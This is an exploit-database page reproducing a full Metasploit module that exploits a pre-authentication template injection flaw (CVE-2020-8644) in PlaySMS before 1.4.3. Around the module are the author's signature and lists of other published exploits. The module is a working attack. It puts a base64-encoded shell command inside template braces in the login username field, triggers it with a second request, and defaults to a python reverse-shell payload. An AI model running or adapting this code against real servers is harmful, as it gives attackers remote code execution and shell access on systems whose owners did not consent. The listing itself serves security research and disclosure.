Search for hundreds of thousands of exploits

"PlaySMS 1.4.3 - Template Injection / Remote Code Execution"

Author

Exploit author

"Touhid M.Shaikh"

Platform

Exploit platform

php

Release date

Exploit published date

2020-03-11

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
        'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code
Execution',
        'Description' => %q{
            This module exploits a Preauth Server-Side Template Injection
leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
            This issue is caused by Double processes a server-side template
by Custom PHP Template system called 'TPL'.
            which is used in PlaySMS template engine location
src/Playsms/Tpl.php:_compile(). When Attacker supply username with a
malicious payload
            and submit. This malicious payload first process by TPL and
save the value in the current template after this value goes for the second
process
            which result in code execution.
            The TPL(https://github.com/antonraharja/tpl) template language
is vulnerable to PHP code injection.

            This module was tested against PlaySMS 1.4 on HackTheBox's
Forlic Machine.
        },
        'Author' =>
          [
            'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit
Module
            'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
          ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            ['CVE','2020-8644'],
            ['URL','
https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
']
          ],
        'DefaultOptions' =>
          {
            'SSL'     => false,
            'PAYLOAD' => 'cmd/unix/reverse_python'
          },
        'Privileged' => false,
        'Platform'   => %w[unix linux],
        'Arch'       => ARCH_CMD,
        'Payload'        =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'python'
            }
        },
        'Targets' =>
          [
            [ 'PlaySMS Before 1.4.3', { } ],
          ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Feb 05 2020'))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Base playsms directory path",
'/']),
        ])
    end

    def uri
      return target_uri.path
    end

    def check
      begin
        res = send_request_cgi({
          'method' => 'GET',
          'uri' => normalize_uri(uri, 'index.php')
        })
      rescue
        vprint_error('Unable to access the index.php file')
        return CheckCode::Unknown
      end

      if res.code == 302 &&
res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
        return Exploit::CheckCode::Appears
      end

      return CheckCode::Safe
    end

    #Send Payload in Login Request
    def login
      res = send_request_cgi({
        'uri' => normalize_uri(uri, 'index.php'),
        'method' => 'GET',
        'vars_get' => {
          'app' => 'main',
          'inc' => 'core_auth',
          'route' => 'login',
        }
      })

      # Grabbing CSRF token from body
      /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
      vprint_good("X-CSRF-Token for login : #{csrf}")

      cookies = res.get_cookies

      vprint_status('Trying to Send Payload in Username Field ......')

      #Encoded in base64 to avoid HTML TAGS which is filter by Application.
      evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64
-d |sh`}}"

      # Send Payload with cookies.
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(uri, 'index.php'),
        'cookie' => cookies,
        'vars_get' => Hash[{
          'app' => 'main',
          'inc' => 'core_auth',
          'route' => 'login',
          'op' => 'login',
        }.to_a.shuffle],
        'vars_post' => Hash[{
          'X-CSRF-Token' => csrf,
          'username' => evil,
          'password' => ''
        }.to_a.shuffle],
      })

      fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request") if res.nil?

      # Request Status Check
      if res.code == 302
        print_good("Payload successfully Sent")
        return cookies
      else
        fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes
Wrong")
      end
    end

    def exploit
      cookies = login
      vprint_status("Cookies here : #{cookies}")
      # Execute Last Sent Username.
      res = send_request_cgi({
        'uri' => normalize_uri(uri, 'index.php'),
        'method' => 'GET',
        'cookie' => cookies,
        'vars_get' => {
          'app' => 'main',
          'inc' => 'core_auth',
          'route' => 'login',
        }
      })
    end
end

-- 
Touhid Shaikh
Exploit Researcher and Developer | Security Consultant
m: +91 7738794435
e: touhidshaikh22@gmail.com
www.touhidshaikh.com [image: Facebook icon]
<https://www.facebook.com/tauheeds1> [image: LinkedIn icon]
<https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon]
<https://twitter.com/touhidshaikh22> [image: Youtube icon]
<https://www.youtube.com/touhidshaikh22>

The content of this email is confidential and intended for the recipient
specified in message only. It is strictly forbidden to share any part of
this message with any third party, without a written consent of the sender.
If you received this message by mistake, please reply to this message and
follow with its deletion, so that we can ensure such a mistake does not
occur in the future.
Release DateTitleTypePlatformAuthor
2020-07-06"RSA IG&L Aveksa 7.1.1 - Remote Code Execution"webappsmultiple"Jakub Palaczynski"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
2020-07-06"Fire Web Server 0.1 - Remote Denial of Service (PoC)"doswindows"Saeed reza Zamanian"
2020-07-06"Grafana 7.0.1 - Denial of Service (PoC)"doslinuxmostwanted002
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
Release DateTitleTypePlatformAuthor
2020-07-06"File Management System 1.1 - Persistent Cross-Site Scripting"webappsphpKeopssGroup0day_Inc
2020-07-06"RiteCMS 2.2.1 - Authenticated Remote Code Execution"webappsphp"Enes Özeser"
2020-07-06"Nagios XI 5.6.12 - 'export-rrd.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel Monzón"
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-26"OpenEMR 5.0.1 - 'controller' Remote Code Execution"webappsphp"Emre ÖVÜNÇ"
Release DateTitleTypePlatformAuthor
2020-03-11"PlaySMS 1.4.3 - Template Injection / Remote Code Execution"webappsphp"Touhid M.Shaikh"
2018-03-30"Vtiger CRM 6.3.0 - (Authenticated) Arbitrary File Upload (Metasploit)"webappsphp"Touhid M.Shaikh"
2017-09-29"Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow"localwindows"Touhid M.Shaikh"
2017-09-28"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow"localwindows"Touhid M.Shaikh"
2017-09-28"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)"doswindows"Touhid M.Shaikh"
2017-09-26"Tiny HTTPd 0.1.0 - Directory Traversal"remotelinux"Touhid M.Shaikh"
2017-09-04"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow"localwindows"Touhid M.Shaikh"
2017-08-28"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Local Buffer Overflow (SEH)"localwindows"Touhid M.Shaikh"
2017-08-28"Easy RM RMVB to DVD Burner 1.8.11 - Local Buffer Overflow (SEH)"localwindows"Touhid M.Shaikh"
2017-08-12"RealTime RWR-3G-100 Router - Cross-Site Request Forgery (Change Admin Password)"webappshardware"Touhid M.Shaikh"
2017-08-10"Piwigo Plugin User Tag 0.9.0 - Cross-Site Scripting"webappsphp"Touhid M.Shaikh"
2017-08-01"VehicleWorkshop - Authentication Bypass"webappsphp"Touhid M.Shaikh"
2017-08-01"VehicleWorkshop - Arbitrary File Upload"webappsphp"Touhid M.Shaikh"
2017-06-12"Easy File Sharing Web Server 7.2 - 'POST' Remote Buffer Overflow"remotewindows"Touhid M.Shaikh"
2017-06-11"Easy File Sharing Web Server 7.2 - Authentication Bypass"remotewindows"Touhid M.Shaikh"
2017-05-31"Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting"webappsphp"Touhid M.Shaikh"
2017-05-30"Piwigo Plugin Facetag 0.0.3 - SQL Injection"webappsphp"Touhid M.Shaikh"
2017-05-26"QWR-1104 Wireless-N Router - Cross-Site Scripting"webappshardware"Touhid M.Shaikh"
2017-05-21"PlaySMS 1.4 - 'import.php' Remote Code Execution"webappsphp"Touhid M.Shaikh"
2017-05-19"D-Link DIR-600M Wireless N 150 - Authentication Bypass"webappshardware"Touhid M.Shaikh"
2017-05-19"PlaySMS 1.4 - Remote Code Execution"webappsphp"Touhid M.Shaikh"
2017-05-14"PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload"webappsphp"Touhid M.Shaikh"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48199/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.